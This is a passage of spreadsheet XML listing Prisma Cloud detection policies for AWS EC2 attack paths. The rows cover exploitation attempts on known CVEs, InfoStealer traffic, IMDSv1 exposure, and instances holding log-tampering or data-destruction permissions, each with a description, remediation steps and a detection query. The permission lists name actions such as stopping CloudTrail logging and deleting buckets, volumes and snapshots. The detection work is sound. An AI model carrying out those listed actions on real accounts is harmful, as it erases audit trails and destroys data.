      <c r="E1812" t="inlineStr"/>
      <c r="F1812" t="inlineStr"/>
      <c r="G1812" t="b">
        <v>1</v>
      </c>
      <c r="H18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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1812" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1812" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [Oracle WebLogic Server, CVE-2020-14882, CVE-2020-14883]</t>
        </is>
      </c>
      <c r="L1812" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1812" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1812" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1812" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1812" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1812" t="inlineStr"/>
      <c r="R1812" t="inlineStr"/>
      <c r="S1812" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1812" t="b">
        <v>0</v>
      </c>
      <c r="U1812" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1812" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1812" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to remote code execution (RCE) with exploits in the wild [Oracle WebLogic Server, CVE-2020-14882, CVE-2020-14883]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of Oracle WebLogic Server software installed makes it an easy target for an attacker to exploit these vulnerabilities. 
Immediate attention is required to remediate the Oracle WebLogic Server [CVE-2020-14882, CVE-2020-14883] vulnerabilities reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X181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CVE-2020-14882
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2020-14882
   https://nvd.nist.gov/vuln/detail/CVE-2020-14883</t>
        </is>
      </c>
      <c r="Y1812" t="inlineStr"/>
      <c r="Z1812" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2020-14882, CVE-2020-14883 - WebLogic RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2020-14882', 'CVE-2020-14883'))</t>
        </is>
      </c>
      <c r="AA1812" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1812" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:32</t>
        </is>
      </c>
      <c r="AC1812" t="inlineStr"/>
      <c r="AD1812" t="b">
        <v>1</v>
      </c>
      <c r="AE1812" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1812" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG18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2" t="inlineStr">
        <is>
          <t>9a3b41bf-f23a-498d-b72b-9512bd04c7b9</t>
        </is>
      </c>
      <c r="AI1812" t="inlineStr">
        <is>
          <t>28cdb37e-cc0c-49a2-bef4-5a93f7b589ea</t>
        </is>
      </c>
      <c r="AJ1812" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1812" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1813">
      <c r="A1813" t="inlineStr"/>
      <c r="B1813" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1813" s="2" t="inlineStr"/>
      <c r="D1813" t="inlineStr"/>
      <c r="E1813" t="inlineStr"/>
      <c r="F1813" t="inlineStr"/>
      <c r="G1813" t="b">
        <v>1</v>
      </c>
      <c r="H18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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1813" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1813" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on AWS EC2 with known exploitable vulnerability (CVE-2021-39144, XStream)</t>
        </is>
      </c>
      <c r="L1813" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1813" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1813" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1813" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1813" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1813" t="inlineStr"/>
      <c r="R1813" t="inlineStr"/>
      <c r="S1813" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1813" t="b">
        <v>0</v>
      </c>
      <c r="U1813" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1813" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1813" t="inlineStr">
        <is>
          <t>This policy identifies attempts to exploit a known vulnerability (CVE-2021-39144) in applications running on AWS EC2 resources. The presence of CVE-2021-39144 in the application indicates a critical security risk that could allow attackers to execute arbitrary code through unsafe deserialization, leading to potential system compromise.
Detecting attempts to exploit this vulnerability underscores the urgency of assessing and securing affected applications to prevent successful attacks. The exploitation of CVE-2021-39144 could lead to significant security incidents, including unauthorized execution of code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CVE-2021-39144 vulnerability on affected AWS EC2 instances. This includes applying security patches, reviewing access controls, and conducting thorough audits to prevent unauthorized code execution. Taking swift measures to address this vulnerability will help protect against unauthorized access and maintain the trust and confidence of stakeholders.</t>
        </is>
      </c>
      <c r="X1813" t="inlineStr">
        <is>
          <t>[Vulnerability]
1. Identify and access the reported resource affected by CVE-2021-39144
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
https://nvd.nist.gov/vuln/detail/CVE-2021-39144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1813" t="inlineStr"/>
      <c r="Z1813" t="inlineStr">
        <is>
          <t>asset WHERE asset.type = 'aws-ec2-describe-instances' and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-39144 - Unsafe Deserialization in XStream) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-39144'))</t>
        </is>
      </c>
      <c r="AA1813" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1813" t="inlineStr">
        <is>
          <t>2024-05-23 08:56:27</t>
        </is>
      </c>
      <c r="AC1813" t="inlineStr"/>
      <c r="AD1813" t="b">
        <v>1</v>
      </c>
      <c r="AE1813" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1813" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG18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3" t="inlineStr">
        <is>
          <t>8b9b1aad-af5c-4530-b67b-137ab0ba2d21</t>
        </is>
      </c>
      <c r="AI1813" t="inlineStr">
        <is>
          <t>f878afb0-c256-4f19-84a9-d98926744444</t>
        </is>
      </c>
      <c r="AJ1813" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1813" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1814">
      <c r="A1814" t="inlineStr"/>
      <c r="B1814" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1814" s="2" t="inlineStr"/>
      <c r="D1814" t="inlineStr"/>
      <c r="E1814" t="inlineStr"/>
      <c r="F1814" t="inlineStr"/>
      <c r="G1814" t="b">
        <v>1</v>
      </c>
      <c r="H18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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1814" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1814" t="inlineStr">
        <is>
          <t>Sensitive data leakage via 'InfoStealer' malware activity detected on a publicly exposed and vulnerable AWS EC2 instance</t>
        </is>
      </c>
      <c r="L1814" t="inlineStr">
        <is>
          <t>MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1814" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1814" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1814" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1814" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1814" t="inlineStr"/>
      <c r="R1814" t="inlineStr"/>
      <c r="S1814" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1814" t="b">
        <v>0</v>
      </c>
      <c r="U1814" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1814" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1814" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed, have critical or high vulnerabilities and are connected with remote systems known for InfoStealer activities.
Infostealers are malicious software programs that gather confidential information from the compromised machine to send it to a predetermined location. This can include information related to the compromised machine, financial data, or user credentials for various web sites. Publicly exposed and exploitable EC2 instances with network connectivity to remote systems known for infostealer activity indicate that the instance may already be under attack or has been compromised.
Immediate attention is required to investigate the infostealer activity, remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X181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14" t="inlineStr"/>
      <c r="Z1814" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)') and ('Traffic from a suspicious IP address associated with InfoStealer activity' or 'Traffic to a suspicious IP address associated with InfoStealer activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1814" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1814" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC1814" t="inlineStr"/>
      <c r="AD1814" t="b">
        <v>1</v>
      </c>
      <c r="AE1814" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1814" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG18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4" t="inlineStr">
        <is>
          <t>44e1f471-924f-477d-a46e-e688d1f76cd8</t>
        </is>
      </c>
      <c r="AI1814" t="inlineStr">
        <is>
          <t>a0d3da32-5458-4a01-9765-c36bc941fb04</t>
        </is>
      </c>
      <c r="AJ1814" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1814" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1815">
      <c r="A1815" t="inlineStr"/>
      <c r="B1815" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1815" s="2" t="inlineStr"/>
      <c r="D1815" t="n">
        <v>6</v>
      </c>
      <c r="E1815" t="n">
        <v>0</v>
      </c>
      <c r="F1815" t="n">
        <v>0</v>
      </c>
      <c r="G1815" t="b">
        <v>1</v>
      </c>
      <c r="H18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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1815" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1815" t="inlineStr">
        <is>
          <t>Cloud Logging tampering risk due to a publicly exposed and vulnerable AWS EC2 instance with risky Defense Evasion permissions</t>
        </is>
      </c>
      <c r="L1815" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1815" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1815" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1815" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1815" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1815" t="inlineStr"/>
      <c r="R1815" t="inlineStr"/>
      <c r="S1815" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1815" t="b">
        <v>0</v>
      </c>
      <c r="U1815" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1815" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1815" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and have Defense Evasion permissions to alter Cloud logging.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. An Attacker with access to defense Evasion permissions that can modify or delete important logs, trails, event selectors, flow logs, log streams, log groups, and manage logging configurations. This could allow an adversary to misuse these permissions, which can result in the loss of crucial logging and monitoring data, hinder troubleshooting and analysis, and impact security event tracking.
This policy checks for the following privilege escalation permissions:
'cloudtrail:DeleteTrail','cloudtrail:PutEventSelectors','cloudtrail:StopLogging','ec2:DeleteFlowLogs','s3:PutBucketLogging','logs:DeleteLogStream','logs:DeleteLogGroup','waf:DeleteLoggingConfiguration','waf:PutLoggingConfiguration'
Immediate attention is required to grant only the minimum privileges required and remove unwanted permissions assigned to the EC2 instance. Remediate critical and high vulnerabilities and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X181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15" t="inlineStr"/>
      <c r="Z1815" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 with cloud log tampering permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1815" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1815" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1815" t="inlineStr"/>
      <c r="AD1815" t="b">
        <v>1</v>
      </c>
      <c r="AE1815" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1815" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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5" t="inlineStr">
        <is>
          <t>117448da-1035-4d40-8fba-9ae7aab14bee</t>
        </is>
      </c>
      <c r="AI1815" t="inlineStr">
        <is>
          <t>af6e1214-714f-4eec-9cf5-af40c0ba004a</t>
        </is>
      </c>
      <c r="AJ1815" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1815" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1816">
      <c r="A1816" t="inlineStr"/>
      <c r="B1816" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1816" s="2" t="inlineStr"/>
      <c r="D1816" t="inlineStr"/>
      <c r="E1816" t="inlineStr"/>
      <c r="F1816" t="inlineStr"/>
      <c r="G1816" t="b">
        <v>1</v>
      </c>
      <c r="H18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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1816" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1816" t="inlineStr">
        <is>
          <t>Command injection risk due to publicly exposed and vulnerable AWS EC2 instance (Atlassian Bitbucket Server and Data Center, CVE-2022-36804)</t>
        </is>
      </c>
      <c r="L1816" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1816" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1816" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1816" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1816" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1816" t="inlineStr"/>
      <c r="R1816" t="inlineStr"/>
      <c r="S1816" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1816" t="b">
        <v>0</v>
      </c>
      <c r="U1816" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1816" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1816" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Command injection vulnerability (CVE-2022-36804).
Command injection vulnerability would allow an attacker to inject arbitrary commands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Atlassian Bitbucket Server and Data Center Command injection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Atlassian Bitbucket Server and Data Center (CVE-2022-36804) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X181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CVE-2022-36804
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-36804</t>
        </is>
      </c>
      <c r="Y1816" t="inlineStr"/>
      <c r="Z1816" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-36804'))</t>
        </is>
      </c>
      <c r="AA1816" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1816" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:10</t>
        </is>
      </c>
      <c r="AC1816" t="inlineStr"/>
      <c r="AD1816" t="b">
        <v>1</v>
      </c>
      <c r="AE1816" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1816" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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6" t="inlineStr">
        <is>
          <t>10ef246a-5d9e-4064-a830-ddee6aee872f</t>
        </is>
      </c>
      <c r="AI1816" t="inlineStr">
        <is>
          <t>f73a1a3d-9fa3-46eb-9a1b-17c6100f3490</t>
        </is>
      </c>
      <c r="AJ1816" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1816" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1817">
      <c r="A1817" t="inlineStr"/>
      <c r="B1817" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1817" s="2" t="inlineStr"/>
      <c r="D1817" t="inlineStr"/>
      <c r="E1817" t="inlineStr"/>
      <c r="F1817" t="inlineStr"/>
      <c r="G1817" t="b">
        <v>1</v>
      </c>
      <c r="H18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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1817" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1817" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [ProxyLogon/HAFNIUM Attack Chain, CVE-2021-26855]</t>
        </is>
      </c>
      <c r="L1817" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1817" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1817" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1817" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1817" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1817" t="inlineStr"/>
      <c r="R1817" t="inlineStr"/>
      <c r="S1817" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1817" t="b">
        <v>0</v>
      </c>
      <c r="U1817" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1817" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1817" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to Remote Code Execution (RCE) with exploits in the wild [ProxyLogon/HAFNIUM Attack Chain, CVE-2021-26855].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version exposed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the ProxyLogon/HAFNIUM Attack Chain vulnerability [CVE-2021-26855] reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X181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CVE-2021-26855
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-26855</t>
        </is>
      </c>
      <c r="Y1817" t="inlineStr"/>
      <c r="Z1817" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-26855 - ProxyLogon/HAFNIUM RCE Attack Chain) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-26855'))</t>
        </is>
      </c>
      <c r="AA1817" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1817" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:35</t>
        </is>
      </c>
      <c r="AC1817" t="inlineStr"/>
      <c r="AD1817" t="b">
        <v>1</v>
      </c>
      <c r="AE1817" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1817" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG18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7" t="inlineStr">
        <is>
          <t>8b258f6a-bade-48e6-862a-ded4bbbf9278</t>
        </is>
      </c>
      <c r="AI1817" t="inlineStr">
        <is>
          <t>39454fd3-c2cc-43d7-b42d-185cd35f1420</t>
        </is>
      </c>
      <c r="AJ1817" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1817" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1818">
      <c r="A1818" t="inlineStr"/>
      <c r="B1818" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1818" s="2" t="inlineStr"/>
      <c r="D1818" t="n">
        <v>36</v>
      </c>
      <c r="E1818" t="n">
        <v>21</v>
      </c>
      <c r="F1818" t="n">
        <v>0</v>
      </c>
      <c r="G1818" t="b">
        <v>1</v>
      </c>
      <c r="H18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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1818" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1818" t="inlineStr">
        <is>
          <t>Privilege escalation and lateral movement risk due to a publicly exposed and vulnerable AWS EC2 instance not configured with Metadata Service v2 (IMDSv2)</t>
        </is>
      </c>
      <c r="L1818" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1818" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1818" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1818" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1818" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1818" t="inlineStr"/>
      <c r="R1818" t="inlineStr"/>
      <c r="S1818" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1818" t="b">
        <v>0</v>
      </c>
      <c r="U1818" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1818" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1818" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and not configured with Instance Metadata Service v2 (IMDSv2).
Publicly exposed and vulnerable AWS EC2 instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Moreover, EC2 instances with access to the IMDSv1 instance metadata service endpoint introduce additional risks. These instances can potentially access sensitive metadata, including temporary security credentials that the attackers can leverage to access the associated resources and extract sensitive data from them.
Immediate attention is required to configure Instance Metadata Service v2 (IMDSv2) instead of IMDSv1 to prevent unauthorized access to sensitive metadata, review risky privilege escalation permissions, remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1818"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[MISCONFIGURATION]
1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Refer 'Configure instance metadata options for existing instances' section from follwoing URL
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html
NOTE: Make a precaution before you enforce the use of IMDSv2, as applications or agents that use IMDSv1 for instance metadata access will break.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18" t="inlineStr"/>
      <c r="Z1818" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2)') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1818" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1818" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1818" t="inlineStr"/>
      <c r="AD1818" t="b">
        <v>1</v>
      </c>
      <c r="AE1818" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1818" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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8" t="inlineStr">
        <is>
          <t>a4798f90-15ed-4fff-a875-9fab2f528ad4</t>
        </is>
      </c>
      <c r="AI1818" t="inlineStr">
        <is>
          <t>ce6240f6-e0ee-46ba-a1d4-dbbcc8a10c56</t>
        </is>
      </c>
      <c r="AJ1818" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1818" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1819">
      <c r="A1819" t="inlineStr"/>
      <c r="B1819" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1819" s="2" t="inlineStr"/>
      <c r="D1819" t="inlineStr"/>
      <c r="E1819" t="inlineStr"/>
      <c r="F1819" t="inlineStr"/>
      <c r="G1819" t="b">
        <v>1</v>
      </c>
      <c r="H18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19" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1819" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1819" t="inlineStr">
        <is>
          <t>Data destruction risk due to malware affected AWS EC2 instance with data destruction permissions</t>
        </is>
      </c>
      <c r="L1819" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE</t>
        </is>
      </c>
      <c r="M1819" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1819" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1819" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1819" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1819" t="inlineStr"/>
      <c r="R1819" t="inlineStr"/>
      <c r="S1819" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1819" t="b">
        <v>0</v>
      </c>
      <c r="U1819" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1819" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1819" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances affected by malware with data destruction permissions.
The detection of grayware or malware within the instance poses a critical security threat, potentially enabling unauthorized access, data compromise, and operational disruption. Data destruction permissions on malware affected EC2 instances may allow an attacker to gain access to the vulnerable instances and leverage that access to delete cloud storage buckets, snapshots, and images and destroy sensitive information stored in your cloud resources causing irreversible damage to your organization.
This policy checks for the following data destruction permissions:
's3:DeleteBucket', 'rds:DeleteDBCluster', 'rds:DeleteDBInstance', 'rds:DeleteDBSnapshot', 'rds:DeleteDBClusterSnapshot', 'rds:DeleteGlobalCluster', 'ec2:DeleteSnapshot', 'ec2:DeleteVolume'
Immediate attention is required to remediate the malware reported for the instances as soon as possible. Review risky permissions, remove unwanted permissions assigned to the EC2 instances, and grant only the least privileges required.</t>
        </is>
      </c>
      <c r="X1819"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819" t="inlineStr"/>
      <c r="Z1819" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('AWS EC2 instance with data destruction permissions'))</t>
        </is>
      </c>
      <c r="AA1819" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1819" t="inlineStr">
        <is>
